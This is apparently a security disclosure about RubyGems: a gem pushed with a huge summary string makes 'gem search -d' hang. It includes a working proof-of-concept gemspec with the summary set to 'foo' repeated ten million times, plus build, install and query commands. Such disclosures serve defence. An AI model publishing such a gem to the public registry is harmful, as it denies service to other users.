Currently, there is no limit for summary length. I think, pushing a gem whose summary is huge, will make
gem search unavailable.
This is not Arbitrary Code Execution, but really easy to attack. According to CVSS v3.0 Calculator, the severity is High (7.5).
1) An attacker creates a gem with huge summary string, and push it to rubygems.org.
2) A victim runs
gem search -d <substring-of-the-name-of-the-gem>, but it will give no response.
It may be good for the gem name to include a frequently-searched keyword, such as "foo-rails-bar" or "foo-sinatra-bar".
1) Prepare the following gemspec.
~~~~ Gem::Specification.new do |spec| spec.name = "huge-summary" spec.version = "0.0.1" spec.authors = ["Yusuke Endoh"] spec.email = ["email@example.com"] spec.summary = "foo" * 10000000 spec.homepage = "http://example.com/" spec.license = "MIT" end ~~~~
2) Run the following commands
~~~~ gem build huge-summary.gemspec gem install huge-summary-0.0.1.gem ~~~~
3) Run the following command.
~~~~ gem query huge-summary -d ~~~~
It will not answer.